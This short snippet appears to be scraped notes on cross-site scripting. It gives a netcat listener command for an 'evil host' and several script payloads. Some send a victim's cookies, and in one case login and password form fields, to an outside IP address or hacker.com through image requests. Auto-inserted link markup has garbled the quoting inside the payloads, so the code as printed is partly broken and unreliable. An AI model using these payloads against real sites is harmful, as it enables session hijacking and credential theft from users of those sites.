listener on evil host:
nc -l -p 80
example script on attacked server:
1 | <script>alert(document.cookie)</script> |
- Example 1
1 | <script>document.write(\'<img src=<a title="http://195.225.45.220/\'" href="http://195.225.45.220/%5C%27" rel="nofollow">http://195.225.45.220/\'</a> + document.cookie + \'>\')</script> |
- Example 2
1 | <script>(new Image).src="<a title="http://195.225.45.220/c.php?c=" href="http://195.225.45.220/c.php?c=" rel="nofollow">http://195.225.45.220/c.php?c=</a>" + escape(document.cookie)</script> |
- Example 3
1 | <script>(new Image).src='<a title="http://www.hacker.com/'" href="http://www.hacker.com/%27" rel="nofollow">http://www.hacker.com/'</a> + document.forms(1).login.value + ':' + document.forms(1).password.value</script> |